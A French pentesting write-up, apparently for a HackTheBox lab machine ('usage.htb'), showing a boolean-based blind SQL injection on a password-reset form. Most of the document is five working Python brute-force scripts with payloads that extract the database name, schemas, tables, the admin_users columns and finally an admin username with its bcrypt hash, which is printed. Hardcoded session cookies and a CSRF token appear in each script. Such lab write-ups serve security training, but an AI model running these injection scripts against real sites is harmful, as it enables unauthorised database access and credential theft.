SQLI (Conditional Responses) - Pentesting Web

Vulnérabilité SQLI:

Nous découvrons un panneau de réinitialisation de mot de passe vulnérable à une injection SQL

. En interceptant les requêtes avec BurpSuite, nous obtenons le message "We have e-mailed your password".

Lorsque nous tentons une injection SQL basique, cela réussit et nous recevons à nouveau le même message d'erreur, confirmant que l'injection fonctionne. Le test d'injection basique est:

iojfeifif' or 1=1-- -

Sqli Conditional responses:

Bien que les résultats de la requête SQL ne soient pas renvoyés et qu'aucun message d'erreur n'apparaisse, l'application affiche le message "We have e-mailed your password" sur la page si la requête renvoie des lignes.

Nous vérifions cette hypothèse en lançant une injection conditionnelle en utilisant la fonction substring pour extraire les premières lettres du nom de la base de données.

Exemples d'injection :

Tester la première lettre du nom de la base : dwwdw' or substring(database(),1,1)='u'-- -
Tester la deuxième lettre du nom de la base : dwwdw' or substring(database(),2,1)='s'-- -

Énumeration nom de la base de données:

Nous automatisons le processus de découverte du nom de la base de données en utilisant un script Python qui envoie des requêtes avec des charges utiles spécifiques et récupère les résultats lorsque le serveur affiche la réponse "We have e-mailed your password".

#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, string

# Handle exit signals
def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl + C to exit
signal.signal(signal.SIGINT, def_handler)

# Expanded character set (add more special characters as needed)
characters = string.ascii_letters + string.digits + "-/;.$_@#~%&*"

main_url = "http://usage.htb/forget-password"

def sqli():
    headers = {
        'Cookie': 'XSRF-TOKEN=eyJpdiI6IllwUVNJUldmNzc1MWU3Tkl6ZzZxZnc9PSIsInZhbHVlIjoieXh5SmFmZTZTYVJFM2dUUnU5UjVLejZ6MmlNWWIwMnVrYzNRVGtNd09yRDNwUjVxSU9zU0xhL0Ruc3RvL29zU3JWN2pNZVBVYkVTUVJDOTBPNXpxYjhQd2loRzJvbURYWVZPS0Q3QUFUc2EwRjk2amNvcG9SQUo0YjlhYXB2SHUiLCJtYWMiOiI0NTgxMzA2YjljOWEwZDI3NTc2NzQwNzk3MGM2MDgyOWRkNWUxZWFkNGU3NWMyMzM4OWVjNTY0MmY4YWE4MmRiIiwidGFnIjoiIn0%3D; '
                  'laravel_session=eyJpdiI6ImYxM2FTbFU2U2pBMUJyUVpqeldreWc9PSIsInZhbHVlIjoiS1hrc3JWRzI0ajhFYjYyQzIrV3hUMzU1M2ptbkIwVzUzQSs3RkdrcGU2bUl0WUlpTHkvWnpmM1IvZWdxMmFrYWw5SWVPNlNNaExMTU5Gd0xKb202bzh0dm9UWVpuKzB4OXBlZmVabmN3NzJTN21xNjJ0ejA0TkV4VHhrdjFkZXYiLCJtYWMiOiIyMzVmYjZlNzAxMjY0ZDUwMzQ5N2ZiZjMxMzcyZDNhNWM3ODFjNTgyNjU5ZDBiNDdlYzQ0MWMxNDkwMDM0ZTc1IiwidGFnIjoiIn0%3D'
    }

    data = ""
    p1 = log.progress("SQL Injection")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Extracted Data")

    for position in range(1, 20):
        found_character = False
        for character in characters:
            payload = {
                "_token": "WwUBzPP0uBH7oSGEGsKholwbP8UZKpSd3u1taSuY",
                "email": f"dwwdwdwwdw' or substring(database(),{position},1)='{character}'-- -"
            }
            
            # Send the POST request with the payload
            r = requests.post(main_url, headers=headers, data=payload)

            # Show the character currently being tested in real time
            p1.status(f"Testing position {position}: {character}")

            # Check for specific feedback from the server to confirm the correct character
            if "We have e-mailed your password" in r.text:
                data += character
                p2.status(data)
                found_character = True
                break

        # If a character was found for this position, move to the next position
        if found_character:
            p1.status(f"Position {position} found: {data[-1]}")
        else:
            p1.status(f"Position {position}: Character not found")

    p1.success("Brute force SQL injection concluded")
    p2.success(f"Extracted data: {data}")

if __name__ == '__main__':
    sqli()

Énumération des bases de données :

Nous modifions la charge utile pour énumérer toutes les bases de données présentes sur le serveur. Nous utilisons la fonction group_concat de la base de données information_schema.schemata pour récupérer toutes les bases de données disponibles. Cette étape permet de découvrir toutes les bases de données présentes.

' or substring((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s" % (position, character)

#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, string

# Handle exit signals
def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl + C to exit
signal.signal(signal.SIGINT, def_handler)

# Expanded character set (add more special characters as needed)
characters = string.ascii_letters + string.digits + "-,/;.$_@#~%&*"

main_url = "http://usage.htb/forget-password"

def sqli():
    headers = {
        'Cookie': 'XSRF-TOKEN=eyJpdiI6IllwUVNJUldmNzc1MWU3Tkl6ZzZxZnc9PSIsInZhbHVlIjoieXh5SmFmZTZTYVJFM2dUUnU5UjVLejZ6MmlNWWIwMnVrYzNRVGtNd09yRDNwUjVxSU9zU0xhL0Ruc3RvL29zU3JWN2pNZVBVYkVTUVJDOTBPNXpxYjhQd2loRzJvbURYWVZPS0Q3QUFUc2EwRjk2amNvcG9SQUo0YjlhYXB2SHUiLCJtYWMiOiI0NTgxMzA2YjljOWEwZDI3NTc2NzQwNzk3MGM2MDgyOWRkNWUxZWFkNGU3NWMyMzM4OWVjNTY0MmY4YWE4MmRiIiwidGFnIjoiIn0%3D; '
                  'laravel_session=eyJpdiI6ImYxM2FTbFU2U2pBMUJyUVpqeldreWc9PSIsInZhbHVlIjoiS1hrc3JWRzI0ajhFYjYyQzIrV3hUMzU1M2ptbkIwVzUzQSs3RkdrcGU2bUl0WUlpTHkvWnpmM1IvZWdxMmFrYWw5SWVPNlNNaExMTU5Gd0xKb202bzh0dm9UWVpuKzB4OXBlZmVabmN3NzJTN21xNjJ0ejA0TkV4VHhrdjFkZXYiLCJtYWMiOiIyMzVmYjZlNzAxMjY0ZDUwMzQ5N2ZiZjMxMzcyZDNhNWM3ODFjNTgyNjU5ZDBiNDdlYzQ0MWMxNDkwMDM0ZTc1IiwidGFnIjoiIn0%3D'
    }

    data = ""
    p1 = log.progress("SQL Injection")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Extracted Data")

    for position in range(1, 100):
        found_character = False
        for character in characters:
            payload = {
                "_token": "WwUBzPP0uBH7oSGEGsKholwbP8UZKpSd3u1taSuY",
                "email": f"dwwdwdwwdw' or substring((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s" % (position, character)

            }
            
            # Send the POST request with the payload
            r = requests.post(main_url, headers=headers, data=payload)

            # Show the character currently being tested in real time
            p1.status(f"Testing position {position}: {character}")

            # Check for specific feedback from the server to confirm the correct character
            if "We have e-mailed your password" in r.text:
                data += character
                p2.status(data)
                found_character = True
                break

        # If a character was found for this position, move to the next position
        if found_character:
            p1.status(f"Position {position} found: {data[-1]}")
        else:
            p1.status(f"Position {position}: Character not found")

    p1.success("Brute force SQL injection concluded")
    p2.success(f"Extracted data: {data}")

if __name__ == '__main__':
    sqli()

Énumération des tables de la base `usage_blog` :

Après avoir trouvé la base de données usage_blog, nous modifions à nouveau la charge utile pour énumérer les tables de cette base de données. Nous utilisons la fonction group_concat pour récupérer les noms de toutes les tables de la base usage_blog.

' or substring((select group_concat(table_name) from information_schema.tables where table_schema='usage_blog'),%d,1)='%s" % (position, character)

#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, string

# Handle exit signals
def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl + C to exit
signal.signal(signal.SIGINT, def_handler)

# Expanded character set (add more special characters as needed)
characters = string.ascii_letters + string.digits + "-,/.;$_@#~%&*"

main_url = "http://usage.htb/forget-password"

def sqli():
    headers = {
        'Cookie': 'XSRF-TOKEN=eyJpdiI6IllwUVNJUldmNzc1MWU3Tkl6ZzZxZnc9PSIsInZhbHVlIjoieXh5SmFmZTZTYVJFM2dUUnU5UjVLejZ6MmlNWWIwMnVrYzNRVGtNd09yRDNwUjVxSU9zU0xhL0Ruc3RvL29zU3JWN2pNZVBVYkVTUVJDOTBPNXpxYjhQd2loRzJvbURYWVZPS0Q3QUFUc2EwRjk2amNvcG9SQUo0YjlhYXB2SHUiLCJtYWMiOiI0NTgxMzA2YjljOWEwZDI3NTc2NzQwNzk3MGM2MDgyOWRkNWUxZWFkNGU3NWMyMzM4OWVjNTY0MmY4YWE4MmRiIiwidGFnIjoiIn0%3D; '
                  'laravel_session=eyJpdiI6ImYxM2FTbFU2U2pBMUJyUVpqeldreWc9PSIsInZhbHVlIjoiS1hrc3JWRzI0ajhFYjYyQzIrV3hUMzU1M2ptbkIwVzUzQSs3RkdrcGU2bUl0WUlpTHkvWnpmM1IvZWdxMmFrYWw5SWVPNlNNaExMTU5Gd0xKb202bzh0dm9UWVpuKzB4OXBlZmVabmN3NzJTN21xNjJ0ejA0TkV4VHhrdjFkZXYiLCJtYWMiOiIyMzVmYjZlNzAxMjY0ZDUwMzQ5N2ZiZjMxMzcyZDNhNWM3ODFjNTgyNjU5ZDBiNDdlYzQ0MWMxNDkwMDM0ZTc1IiwidGFnIjoiIn0%3D'
    }

    data = ""
    p1 = log.progress("SQL Injection")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Extracted Data")

    for position in range(1, 1000):
        found_character = False
        for character in characters:
            payload = {
                "_token": "WwUBzPP0uBH7oSGEGsKholwbP8UZKpSd3u1taSuY",
                "email": f"dwwdwdwwdw' or substring((select group_concat(table_name) from information_schema.tables where table_schema='usage_blog'),%d,1)='%s" % (position, character) 

            }
            
            # Send the POST request with the payload
            r = requests.post(main_url, headers=headers, data=payload)

            # Show the character currently being tested in real time
            p1.status(f"Testing position {position}: {character}")

            # Check for specific feedback from the server to confirm the correct character
            if "We have e-mailed your password" in r.text:
                data += character
                p2.status(data)
                found_character = True
                break

        # If a character was found for this position, move to the next position
        if found_character:
            p1.status(f"Position {position} found: {data[-1]}")
        else:
            p1.status(f"Position {position}: Character not found")

    p1.success("Brute force SQL injection concluded")
    p2.success(f"Extracted data: {data}")

if __name__ == '__main__':
    sqli()

Énumération des colonnes de la table `admin_users` :

Une fois les tables identifiées, nous ciblons la table admin_users pour énumérer ses colonnes. Nous utilisons encore une fois la fonction group_concat pour récupérer les noms des colonnes de cette table spécifique.

' or substring((select group_concat(column_name) from information_schema.columns where table_schema='usage_blog' and table_name='admin_users'),%d,1
)='%s" % (position, character)

#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, string

# Handle exit signals
def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl + C to exit
signal.signal(signal.SIGINT, def_handler)

# Expanded character set (add more special characters as needed)
characters = string.ascii_letters + string.digits + "-,/;$._@#~%&*"

main_url = "http://usage.htb/forget-password"

def sqli():
    headers = {
        'Cookie': 'XSRF-TOKEN=eyJpdiI6IllwUVNJUldmNzc1MWU3Tkl6ZzZxZnc9PSIsInZhbHVlIjoieXh5SmFmZTZTYVJFM2dUUnU5UjVLejZ6MmlNWWIwMnVrYzNRVGtNd09yRDNwUjVxSU9zU0xhL0Ruc3RvL29zU3JWN2pNZVBVYkVTUVJDOTBPNXpxYjhQd2loRzJvbURYWVZPS0Q3QUFUc2EwRjk2amNvcG9SQUo0YjlhYXB2SHUiLCJtYWMiOiI0NTgxMzA2YjljOWEwZDI3NTc2NzQwNzk3MGM2MDgyOWRkNWUxZWFkNGU3NWMyMzM4OWVjNTY0MmY4YWE4MmRiIiwidGFnIjoiIn0%3D; '
                  'laravel_session=eyJpdiI6ImYxM2FTbFU2U2pBMUJyUVpqeldreWc9PSIsInZhbHVlIjoiS1hrc3JWRzI0ajhFYjYyQzIrV3hUMzU1M2ptbkIwVzUzQSs3RkdrcGU2bUl0WUlpTHkvWnpmM1IvZWdxMmFrYWw5SWVPNlNNaExMTU5Gd0xKb202bzh0dm9UWVpuKzB4OXBlZmVabmN3NzJTN21xNjJ0ejA0TkV4VHhrdjFkZXYiLCJtYWMiOiIyMzVmYjZlNzAxMjY0ZDUwMzQ5N2ZiZjMxMzcyZDNhNWM3ODFjNTgyNjU5ZDBiNDdlYzQ0MWMxNDkwMDM0ZTc1IiwidGFnIjoiIn0%3D'
    }

    data = ""
    p1 = log.progress("SQL Injection")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Extracted Data")

    for position in range(1, 1000):
        found_character = False
        for character in characters:
            payload = {
                "_token": "WwUBzPP0uBH7oSGEGsKholwbP8UZKpSd3u1taSuY",
                "email": f"dwwdwdwwdw' or substring((select group_concat(column_name) from information_schema.columns where table_schema='usage_blog' and table_name='admin_users'),%d,1)='%s" % (position, character) 

            }
            
            # Send the POST request with the payload
            r = requests.post(main_url, headers=headers, data=payload)

            # Show the character currently being tested in real time
            p1.status(f"Testing position {position}: {character}")

            # Check for specific feedback from the server to confirm the correct character
            if "We have e-mailed your password" in r.text:
                data += character
                p2.status(data)
                found_character = True
                break

        # If a character was found for this position, move to the next position
        if found_character:
            p1.status(f"Position {position} found: {data[-1]}")
        else:
            p1.status(f"Position {position}: Character not found")

    p1.success("Brute force SQL injection concluded")
    p2.success(f"Extracted data: {data}")

if __name__ == '__main__':
    sqli()

Affichage des `username` et `password` :

Pour afficher les identifiants et mots de passe des utilisateurs dans la table admin_users, la requête SQL sera modifiée de manière à concaténer les champs username et password

' or substring((select group_concat((BINARY username), ':', (BINARY password)) from admin_users),%d,1)='%s" % (position, character)

#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, string

# Handle exit signals
def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl + C to exit
signal.signal(signal.SIGINT, def_handler)

# Expanded character set (add more special characters as needed)
characters = string.ascii_letters + string.digits + "-:.,/;$_@#~%&*"

main_url = "http://usage.htb/forget-password"

def sqli():
    headers = {
        'Cookie': 'XSRF-TOKEN=eyJpdiI6IllwUVNJUldmNzc1MWU3Tkl6ZzZxZnc9PSIsInZhbHVlIjoieXh5SmFmZTZTYVJFM2dUUnU5UjVLejZ6MmlNWWIwMnVrYzNRVGtNd09yRDNwUjVxSU9zU0xhL0Ruc3RvL29zU3JWN2pNZVBVYkVTUVJDOTBPNXpxYjhQd2loRzJvbURYWVZPS0Q3QUFUc2EwRjk2amNvcG9SQUo0YjlhYXB2SHUiLCJtYWMiOiI0NTgxMzA2YjljOWEwZDI3NTc2NzQwNzk3MGM2MDgyOWRkNWUxZWFkNGU3NWMyMzM4OWVjNTY0MmY4YWE4MmRiIiwidGFnIjoiIn0%3D; '
                  'laravel_session=eyJpdiI6ImYxM2FTbFU2U2pBMUJyUVpqeldreWc9PSIsInZhbHVlIjoiS1hrc3JWRzI0ajhFYjYyQzIrV3hUMzU1M2ptbkIwVzUzQSs3RkdrcGU2bUl0WUlpTHkvWnpmM1IvZWdxMmFrYWw5SWVPNlNNaExMTU5Gd0xKb202bzh0dm9UWVpuKzB4OXBlZmVabmN3NzJTN21xNjJ0ejA0TkV4VHhrdjFkZXYiLCJtYWMiOiIyMzVmYjZlNzAxMjY0ZDUwMzQ5N2ZiZjMxMzcyZDNhNWM3ODFjNTgyNjU5ZDBiNDdlYzQ0MWMxNDkwMDM0ZTc1IiwidGFnIjoiIn0%3D'
    }

    data = ""
    p1 = log.progress("SQL Injection")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Extracted Data")

    for position in range(1, 1000):
        found_character = False
        for character in characters:
            payload = {
                "_token": "WwUBzPP0uBH7oSGEGsKholwbP8UZKpSd3u1taSuY",
                "email": f"dwwdwdwwdw' or substring((select group_concat((BINARY username), ':', (BINARY password)) from admin_users),%d,1)='%s" % (position, character)

            }
            
            # Send the POST request with the payload
            r = requests.post(main_url, headers=headers, data=payload)

            # Show the character currently being tested in real time
            p1.status(f"Testing position {position}: {character}")

            # Check for specific feedback from the server to confirm the correct character
            if "We have e-mailed your password" in r.text:
                data += character
                p2.status(data)
                found_character = True
                break

        # If a character was found for this position, move to the next position
        if found_character:
            p1.status(f"Position {position} found: {data[-1]}")
        else:
            p1.status(f"Position {position}: Character not found")

    p1.success("Brute force SQL injection concluded")
    p2.success(f"Extracted data: {data}")

if __name__ == '__main__':
    sqli()

admin:$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?